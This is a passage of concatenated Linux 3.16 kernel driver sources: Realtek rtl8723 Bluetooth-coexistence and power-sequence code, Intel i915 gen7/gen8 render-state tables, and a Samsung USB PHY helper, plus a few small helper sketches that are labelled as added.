rtlpcipriv->bt_coexist.cur_bt_disabled) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is from %s to %s!!\n",
(rtlpcipriv->bt_coexist.pre_bt_disabled ?
"disabled" : "enabled"),
(rtlpcipriv->bt_coexist.cur_bt_disabled ?
"disabled" : "enabled"));
rtlpcipriv->bt_coexist.pre_bt_disabled
= rtlpcipriv->bt_coexist.cur_bt_disabled;
}
}
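/* Periodic BT-coexistence entry point for 8723A: query BT info, update
 * the hardware counters, check whether BT is enabled and run the 1- or
 * 2-antenna mechanism.
 */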
void rtl8723ae_dm_bt_coexist_8723(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
rtl8723ae_dm_bt_query_bt_information(hw);
rtl8723ae_dm_bt_bt_hw_counters_monitor(hw);
rtl8723ae_dm_bt_bt_enable_disable_check(hw);
if (rtlpcipriv->bt_coexist.bt_ant_num == ANT_X2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], 2 Ant mechanism\n");
_rtl8723ae_dm_bt_coexist_2_ant(hw);
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], 1 Ant mechanism\n");
_rtl8723ae_dm_bt_coexist_1_ant(hw);
}
if (!rtl8723ae_dm_bt_is_same_coexist_state(hw)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Coexist State[bitMap] change from 0x%x%8x to 0x%x%8x\n",
rtlpcipriv->bt_coexist.previous_state_h,
rtlpcipriv->bt_coexist.previous_state,
rtlpcipriv->bt_coexist.cstate_h,
rtlpcipriv->bt_coexist.cstate);
rtlpcipriv->bt_coexist.previous_state
= rtlpcipriv->bt_coexist.cstate;
rtlpcipriv->bt_coexist.previous_state_h
= rtlpcipriv->bt_coexist.cstate_h;
}
}
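/* Parse the C2H BT_INFO payload: byte 0 holds the BT status bits,
 * byte 1 the BT retry count.
 */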
static void rtl8723ae_dm_bt_parse_bt_info(struct ieee80211_hw *hw,
u8 *tmbuf, u8 len)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 bt_info;
u8 i;
rtlhal->hal_coex_8723.c2h_bt_info_req_sent = false;
rtlhal->hal_coex_8723.bt_retry_cnt = 0;
for (i = 0; i < len; i++) {
if (i == 0)
rtlhal->hal_coex_8723.c2h_bt_info_original = tmbuf[i];
else if (i == 1)
rtlhal->hal_coex_8723.bt_retry_cnt = tmbuf[i];
if (i == len-1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"0x%2x]", tmbuf[i]);
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"0x%2x, ", tmbuf[i]);
}
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"BT info bt_info (Data)= 0x%x\n",
rtlhal->hal_coex_8723.c2h_bt_info_original);
bt_info = rtlhal->hal_coex_8723.c2h_bt_info_original;
if (bt_info & BIT(2))
rtlhal->hal_coex_8723.c2h_bt_inquiry_page = true;
else
rtlhal->hal_coex_8723.c2h_bt_inquiry_page = false;
if (bt_info & BTINFO_B_CONNECTION) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTC2H], BTInfo: bConnect=true\n");
rtlpcipriv->bt_coexist.bt_busy = true;
rtlpcipriv->bt_coexist.cstate &= ~BT_COEX_STATE_BT_IDLE;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTC2H], BTInfo: bConnect=false\n");
rtlpcipriv->bt_coexist.bt_busy = false;
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_BT_IDLE;
}
}
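/* Read a pending C2H event from REG_C2HEVT_MSG_NORMAL, dispatch it by
 * command id (currently only BT_INFO is handled) and release the
 * mailbox for the next event.
 */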
void rtl_8723e_c2h_command_handle(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct c2h_evt_hdr c2h_event;
u8 *ptmbuf;
u8 index;
u8 u1tmp;
memset(&c2h_event, 0, sizeof(c2h_event));
u1tmp = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL);
RT_TRACE(rtlpriv, COMP_FW, DBG_DMESG,
"&&&&&&: REG_C2HEVT_MSG_NORMAL is 0x%x\n", u1tmp);
c2h_event.cmd_id = u1tmp & 0xF;
c2h_event.cmd_len = (u1tmp & 0xF0) >> 4;
c2h_event.cmd_seq = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL + 1);
RT_TRACE(rtlpriv, COMP_FW, DBG_DMESG,
"cmd_id: %d, cmd_len: %d, cmd_seq: %d\n",
c2h_event.cmd_id, c2h_event.cmd_len, c2h_event.cmd_seq);
u1tmp = rtl_read_byte(rtlpriv, 0x01AF);
if (u1tmp == C2H_EVT_HOST_CLOSE) {
return;
} else if (u1tmp != C2H_EVT_FW_CLOSE) {
rtl_write_byte(rtlpriv, 0x1AF, 0x00);
return;
}
ptmbuf = kmalloc(c2h_event.cmd_len, GFP_KERNEL);
if (ptmbuf == NULL) {
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"malloc cmd buf failed\n");
return;
}
/* Read the content */
for (index = 0; index < c2h_event.cmd_len; index++)
ptmbuf[index] = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL +
2 + index);
switch (c2h_event.cmd_id) {
case C2H_BT_RSSI:
break;
case C2H_BT_OP_MODE:
break;
case BT_INFO:
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[0] (ID) is 0x%x\n", c2h_event.cmd_id);
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[1] (Seq) is 0x%x\n", c2h_event.cmd_seq);
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[2] (Data)= 0x%x\n", ptmbuf[0]);
rtl8723ae_dm_bt_parse_bt_info(hw, ptmbuf, c2h_event.cmd_len);
break;
default:
break;
}
kfree(ptmbuf);
rtl_write_byte(rtlpriv, 0x01AF, C2H_EVT_HOST_CLOSE);
}
<|start_filename|>linux-3.16/drivers/gpu/drm/i915/intel_renderstate_gen7.c<|end_filename|>
#include "intel_renderstate.h"
static const u32 gen7_null_state_relocs[] = {
0x0000000c,
0x00000010,
0x00000018,
0x000001ec,
};
static const u32 gen7_null_state_batch[] = {
0x69040000,
0x61010008,
0x00000000,
0x00000001, /* reloc */
0x00000001, /* reloc */
0x00000000,
0x00000001, /* reloc */
0x00000000,
0x00000001,
0x00000000,
0x00000001,
0x790d0002,
0x00000000,
0x00000000,
0x00000000,
0x78180000,
0x00000001,
0x79160000,
0x00000008,
0x78300000,
0x02010040,
0x78310000,
0x04000000,
0x78320000,
0x04000000,
0x78330000,
0x02000000,
0x78100004,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781b0005,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781c0002,
0x00000000,
0x00000000,
0x00000000,
0x781d0004,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78110005,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78120002,
0x00000000,
0x00000000,
0x00000000,
0x78210000,
0x00000000,
0x78130005,
0x00000000,
0x20000000,
0x04000000,
0x00000000,
0x00000000,
0x00000000,
0x78140001,
0x20000800,
0x00000000,
0x781e0001,
0x00000000,
0x00000000,
0x78050005,
0xe0040000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78040001,
0x00000000,
0x00000000,
0x78240000,
0x00000240,
0x78230000,
0x00000260,
0x782f0000,
0x00000280,
0x781f000c,
0x00400810,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78200006,
0x000002c0,
0x08080000,
0x00000000,
0x28000402,
0x00060000,
0x00000000,
0x00000000,
0x78090005,
0x02000000,
0x22220000,
0x02f60000,
0x11230000,
0x02f60004,
0x11230000,
0x78080003,
0x00006008,
0x00000340, /* reloc */
0xffffffff,
0x00000000,
0x782a0000,
0x00000360,
0x79000002,
0xffffffff,
0x00000000,
0x00000000,
0x7b000005,
0x0000000f,
0x00000003,
0x00000000,
0x00000001,
0x00000000,
0x00000000,
0x05000000, /* cmds end */
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000031, /* state start */
0x00000003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0xf99a130c,
0x799a130c,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000492,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x0080005a,
0x2e2077bd,
0x000000c0,
0x008d0040,
0x0080005a,
0x2e6077bd,
0x000000d0,
0x008d0040,
0x02800031,
0x21801fa9,
0x008d0e20,
0x08840001,
0x00800001,
0x2e2003bd,
0x008d0180,
0x00000000,
0x00800001,
0x2e6003bd,
0x008d01c0,
0x00000000,
0x00800001,
0x2ea003bd,
0x008d0200,
0x00000000,
0x00800001,
0x2ee003bd,
0x008d0240,
0x00000000,
0x05800031,
0x20001fa8,
0x008d0e20,
0x90031000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000380,
0x000003a0,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000, /* state end */
};
RO_RENDERSTATE(7);
<|start_filename|>linux-3.16/drivers/gpu/drm/i915/intel_renderstate_gen8.c<|end_filename|>
#include "intel_renderstate.h"
static const u32 gen8_null_state_relocs[] = {
0x00000048,
0x00000050,
0x00000060,
0x000003ec,
};
static const u32 gen8_null_state_batch[] = {
0x69040000,
0x61020001,
0x00000000,
0x00000000,
0x79120000,
0x00000000,
0x79130000,
0x00000000,
0x79140000,
0x00000000,
0x79150000,
0x00000000,
0x79160000,
0x00000000,
0x6101000e,
0x00000001,
0x00000000,
0x00000001,
0x00000001, /* reloc */
0x00000000,
0x00000001, /* reloc */
0x00000000,
0x00000000,
0x00000000,
0x00000001, /* reloc */
0x00000000,
0xfffff001,
0x00001001,
0xfffff001,
0x00001001,
0x78230000,
0x000006e0,
0x78210000,
0x00000700,
0x78300000,
0x08010040,
0x78330000,
0x08000000,
0x78310000,
0x08000000,
0x78320000,
0x08000000,
0x78240000,
0x00000641,
0x780e0000,
0x00000601,
0x780d0000,
0x00000000,
0x78180000,
0x00000001,
0x78520003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78190009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781b0007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78270000,
0x00000000,
0x782c0000,
0x00000000,
0x781c0002,
0x00000000,
0x00000000,
0x00000000,
0x78160009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78110008,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78290000,
0x00000000,
0x782e0000,
0x00000000,
0x781a0009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781d0007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78280000,
0x00000000,
0x782d0000,
0x00000000,
0x78260000,
0x00000000,
0x782b0000,
0x00000000,
0x78150009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78100007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781e0003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78120002,
0x00000000,
0x00000000,
0x00000000,
0x781f0002,
0x30400820,
0x00000000,
0x00000000,
0x78510009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78500003,
0x00210000,
0x00000000,
0x00000000,
0x00000000,
0x78130002,
0x00000000,
0x00000000,
0x00000000,
0x782a0000,
0x00000480,
0x782f0000,
0x00000540,
0x78140000,
0x00000800,
0x78170009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x7820000a,
0x00000580,
0x00000000,
0x08080000,
0x00000000,
0x00000000,
0x1f000002,
0x00060000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x784d0000,
0x40000000,
0x784f0000,
0x80000100,
0x780f0000,
0x00000740,
0x78050006,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78070003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78060003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78040001,
0x00000000,
0x00000001,
0x79000002,
0xffffffff,
0x00000000,
0x00000000,
0x78080003,
0x00006000,
0x000005e0, /* reloc */
0x00000000,
0x00000000,
0x78090005,
0x02000000,
0x22220000,
0x02f60000,
0x11230000,
0x02850004,
0x11230000,
0x784b0000,
0x0000000f,
0x78490001,
0x00000000,
0x00000000,
0x7b000005,
0x00000000,
0x00000003,
0x00000000,
0x00000001,
0x00000000,
0x00000000,
0x05000000, /* cmds end */
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x000004c0, /* state start */
0x00000500,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000092,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x0060005a,
0x21403ae8,
0x3a0000c0,
0x008d0040,
0x0060005a,
0x21603ae8,
0x3a0000c0,
0x008d0080,
0x0060005a,
0x21803ae8,
0x3a0000d0,
0x008d0040,
0x0060005a,
0x21a03ae8,
0x3a0000d0,
0x008d0080,
0x02800031,
0x2e0022e8,
0x0e000140,
0x08840001,
0x05800031,
0x200022e0,
0x0e000e00,
0x90031000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0xf99a130c,
0x799a130c,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x3f800000,
0x00000000,
0x3f800000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000, /* state end */
};
RO_RENDERSTATE(8);
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/pwrseqcmd.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "pwrseq.h"
/* Description:
 * This routine deals with parsing the Power Configuration CMDs
 * for the RTL8723/RTL8188E series ICs.
 * Assumption:
 * We should follow the specific format released by HW SD.
*
* 2011.07.07, added by Roger.
*/
bool rtlbe_hal_pwrseqcmdparsing(struct rtl_priv *rtlpriv, u8 cut_version,
u8 fab_version, u8 interface_type,
struct wlan_pwr_cfg pwrcfgcmd[])
{
struct wlan_pwr_cfg pwr_cfg_cmd = {0};
bool b_polling_bit = false;
u32 ary_idx = 0;
u8 value = 0;
u32 offset = 0;
u32 polling_count = 0;
u32 max_polling_cnt = 5000;
do {
pwr_cfg_cmd = pwrcfgcmd[ary_idx];
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"offset(%#x),cut_msk(%#x), fab_msk(%#x),"
"interface_msk(%#x), base(%#x), "
"cmd(%#x), msk(%#x), value(%#x)\n",
GET_PWR_CFG_OFFSET(pwr_cfg_cmd),
GET_PWR_CFG_CUT_MASK(pwr_cfg_cmd),
GET_PWR_CFG_FAB_MASK(pwr_cfg_cmd),
GET_PWR_CFG_INTF_MASK(pwr_cfg_cmd),
GET_PWR_CFG_BASE(pwr_cfg_cmd),
GET_PWR_CFG_CMD(pwr_cfg_cmd),
GET_PWR_CFG_MASK(pwr_cfg_cmd),
GET_PWR_CFG_VALUE(pwr_cfg_cmd));
if ((GET_PWR_CFG_FAB_MASK(pwr_cfg_cmd)&fab_version) &&
(GET_PWR_CFG_CUT_MASK(pwr_cfg_cmd)&cut_version) &&
(GET_PWR_CFG_INTF_MASK(pwr_cfg_cmd)&interface_type)) {
switch (GET_PWR_CFG_CMD(pwr_cfg_cmd)) {
case PWR_CMD_READ:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_READ\n");
break;
case PWR_CMD_WRITE:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_WRITE\n");
offset = GET_PWR_CFG_OFFSET(pwr_cfg_cmd);
/*Read the value from system register*/
value = rtl_read_byte(rtlpriv, offset);
value &= (~(GET_PWR_CFG_MASK(pwr_cfg_cmd)));
value = value | (GET_PWR_CFG_VALUE(pwr_cfg_cmd)
& GET_PWR_CFG_MASK(pwr_cfg_cmd));
/*Write the value back to system register*/
rtl_write_byte(rtlpriv, offset, value);
break;
case PWR_CMD_POLLING:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_POLLING\n");
b_polling_bit = false;
offset = GET_PWR_CFG_OFFSET(pwr_cfg_cmd);
do {
value = rtl_read_byte(rtlpriv, offset);
value &= GET_PWR_CFG_MASK(pwr_cfg_cmd);
if (value ==
(GET_PWR_CFG_VALUE(pwr_cfg_cmd) &
GET_PWR_CFG_MASK(pwr_cfg_cmd)))
b_polling_bit = true;
else
udelay(10);
if (polling_count++ > max_polling_cnt)
return false;
} while (!b_polling_bit);
break;
case PWR_CMD_DELAY:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_DELAY\n");
if (GET_PWR_CFG_VALUE(pwr_cfg_cmd) ==
PWRSEQ_DELAY_US)
udelay(GET_PWR_CFG_OFFSET(pwr_cfg_cmd));
else
mdelay(GET_PWR_CFG_OFFSET(pwr_cfg_cmd));
break;
case PWR_CMD_END:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_END\n");
return true;
break;
default:
RT_ASSERT(false,
"rtlbe_hal_pwrseqcmdparsing(): "
"Unknown CMD!!\n");
break;
}
}
ary_idx++;
} while (1);
return true;
}
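/*
 * Illustrative call sketch (not part of the original file): the parser is
 * normally driven from the HAL power-on/off paths with a command table that
 * is terminated by a PWR_CMD_END entry.  The mask and table macros used
 * below (PWR_CUT_ALL_MSK, PWR_FAB_ALL_MSK, PWR_INTF_PCI_MSK,
 * RTL8723_NIC_ENABLE_FLOW) are assumed to be provided by pwrseq.h; treat
 * them as placeholders if the local names differ.
 */
static bool rtl8723be_example_power_on(struct rtl_priv *rtlpriv)
{
	/* Only table rows whose cut/fab/interface masks match are executed. */
	return rtlbe_hal_pwrseqcmdparsing(rtlpriv, PWR_CUT_ALL_MSK,
					  PWR_FAB_ALL_MSK, PWR_INTF_PCI_MSK,
					  RTL8723_NIC_ENABLE_FLOW);
}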
<|start_filename|>linux-3.16/drivers/usb/phy/phy-samsung-usb.c<|end_filename|>
/* linux/drivers/usb/phy/phy-samsung-usb.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com
*
* Author: <NAME> <<EMAIL>>
*
* Samsung USB-PHY helper driver with common function calls;
* interacts with Samsung USB 2.0 PHY controller driver and later
* with Samsung USB 3.0 PHY driver.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <linux/device.h>
#include <linux/err.h>
#include <linux/io.h>
#include <linux/of.h>
#include <linux/of_address.h>
#include <linux/usb/samsung_usb_phy.h>
#include "phy-samsung-usb.h"
int samsung_usbphy_parse_dt(struct samsung_usbphy *sphy)
{
struct device_node *usbphy_sys;
/* Getting node for system controller interface for usb-phy */
usbphy_sys = of_get_child_by_name(sphy->dev->of_node, "usbphy-sys");
if (!usbphy_sys) {
dev_err(sphy->dev, "No sys-controller interface for usb-phy\n");
return -ENODEV;
}
sphy->pmuregs = of_iomap(usbphy_sys, 0);
if (sphy->pmuregs == NULL) {
dev_err(sphy->dev, "Can't get usb-phy pmu control register\n");
goto err0;
}
sphy->sysreg = of_iomap(usbphy_sys, 1);
/*
* Not returning error code here, since this situation is not fatal.
 * Some SoCs may not have this switch available
*/
if (sphy->sysreg == NULL)
dev_warn(sphy->dev, "Can't get usb-phy sysreg cfg register\n");
of_node_put(usbphy_sys);
return 0;
err0:
of_node_put(usbphy_sys);
return -ENXIO;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_parse_dt);
/*
* Set isolation here for phy.
 * Here 'on = true' means the USB PHY block is isolated and hence
 * de-activated, and vice-versa.
*/
void samsung_usbphy_set_isolation_4210(struct samsung_usbphy *sphy, bool on)
{
void __iomem *reg = NULL;
u32 reg_val;
u32 en_mask = 0;
if (!sphy->pmuregs) {
dev_warn(sphy->dev, "Can't set pmu isolation\n");
return;
}
if (sphy->phy_type == USB_PHY_TYPE_DEVICE) {
reg = sphy->pmuregs + sphy->drv_data->devphy_reg_offset;
en_mask = sphy->drv_data->devphy_en_mask;
} else if (sphy->phy_type == USB_PHY_TYPE_HOST) {
reg = sphy->pmuregs + sphy->drv_data->hostphy_reg_offset;
en_mask = sphy->drv_data->hostphy_en_mask;
}
reg_val = readl(reg);
if (on)
reg_val &= ~en_mask;
else
reg_val |= en_mask;
writel(reg_val, reg);
if (sphy->drv_data->cpu_type == TYPE_EXYNOS4X12) {
writel(reg_val, sphy->pmuregs + EXYNOS4X12_PHY_HSIC_CTRL0);
writel(reg_val, sphy->pmuregs + EXYNOS4X12_PHY_HSIC_CTRL1);
}
}
EXPORT_SYMBOL_GPL(samsung_usbphy_set_isolation_4210);
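/*
 * Minimal usage sketch (hypothetical helpers, not from the original driver)
 * spelling out the inverted meaning of 'on': passing false releases the PMU
 * isolation and therefore activates the PHY block.
 */
static void example_phy_activate(struct samsung_usbphy *sphy)
{
	samsung_usbphy_set_isolation_4210(sphy, false);	/* un-isolate = power up */
}

static void example_phy_deactivate(struct samsung_usbphy *sphy)
{
	samsung_usbphy_set_isolation_4210(sphy, true);	/* isolate = power down */
}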
/*
* Configure the mode of working of usb-phy here: HOST/DEVICE.
*/
void samsung_usbphy_cfg_sel(struct samsung_usbphy *sphy)
{
u32 reg;
if (!sphy->sysreg) {
dev_warn(sphy->dev, "Can't configure specified phy mode\n");
return;
}
reg = readl(sphy->sysreg);
if (sphy->phy_type == USB_PHY_TYPE_DEVICE)
reg &= ~EXYNOS_USB20PHY_CFG_HOST_LINK;
else if (sphy->phy_type == USB_PHY_TYPE_HOST)
reg |= EXYNOS_USB20PHY_CFG_HOST_LINK;
writel(reg, sphy->sysreg);
}
EXPORT_SYMBOL_GPL(samsung_usbphy_cfg_sel);
/*
* PHYs are different for USB Device and USB Host.
 * This makes sure that the correct PHY type is selected before
 * any operation on the PHY.
*/
int samsung_usbphy_set_type(struct usb_phy *phy,
enum samsung_usb_phy_type phy_type)
{
struct samsung_usbphy *sphy = phy_to_sphy(phy);
sphy->phy_type = phy_type;
return 0;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_set_type);
int samsung_usbphy_rate_to_clksel_64xx(struct samsung_usbphy *sphy,
unsigned long rate)
{
unsigned int clksel;
switch (rate) {
case 12 * MHZ:
clksel = PHYCLK_CLKSEL_12M;
break;
case 24 * MHZ:
clksel = PHYCLK_CLKSEL_24M;
break;
case 48 * MHZ:
clksel = PHYCLK_CLKSEL_48M;
break;
default:
dev_err(sphy->dev,
"Invalid reference clock frequency: %lu\n", rate);
return -EINVAL;
}
return clksel;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_rate_to_clksel_64xx);
int samsung_usbphy_rate_to_clksel_4x12(struct samsung_usbphy *sphy,
unsigned long rate)
{
unsigned int clksel;
switch (rate) {
case 9600 * KHZ:
clksel = FSEL_CLKSEL_9600K;
break;
case 10 * MHZ:
clksel = FSEL_CLKSEL_10M;
break;
case 12 * MHZ:
clksel = FSEL_CLKSEL_12M;
break;
case 19200 * KHZ:
clksel = FSEL_CLKSEL_19200K;
break;
case 20 * MHZ:
clksel = FSEL_CLKSEL_20M;
break;
case 24 * MHZ:
clksel = FSEL_CLKSEL_24M;
break;
case 50 * MHZ:
clksel = FSEL_CLKSEL_50M;
break;
default:
dev_err(sphy->dev,
"Invalid reference clock frequency: %lu\n", rate);
return -EINVAL;
}
return clksel;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_rate_to_clksel_4x12);
/*
* Returns reference clock frequency selection value
*/
int samsung_usbphy_get_refclk_freq(struct samsung_usbphy *sphy)
{
struct clk *ref_clk;
unsigned long rate;
int refclk_freq;
/*
* In exynos5250 USB host and device PHY use
* external crystal clock XXTI
*/
if (sphy->drv_data->cpu_type == TYPE_EXYNOS5250)
ref_clk = clk_get(sphy->dev, "ext_xtal");
else
ref_clk = clk_get(sphy->dev, "xusbxti");
if (IS_ERR(ref_clk)) {
dev_err(sphy->dev, "Failed to get reference clock\n");
return PTR_ERR(ref_clk);
}
rate = clk_get_rate(ref_clk);
refclk_freq = sphy->drv_data->rate_to_clksel(sphy, rate);
clk_put(ref_clk);
return refclk_freq;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_get_refclk_freq);
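/*
 * Probe-time usage sketch (illustrative only, not part of the original
 * file): map the PMU/system-register interface described by the
 * "usbphy-sys" child node, then translate the reference clock rate into a
 * CLKSEL field value.  The ref_clk_freq member is assumed to exist in
 * struct samsung_usbphy, as in the companion header.
 */
static int example_usbphy_setup(struct samsung_usbphy *sphy)
{
	int ret;

	ret = samsung_usbphy_parse_dt(sphy);
	if (ret < 0)
		return ret;

	ret = samsung_usbphy_get_refclk_freq(sphy);
	if (ret < 0)
		return ret;

	sphy->ref_clk_freq = ret;
	return 0;
}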
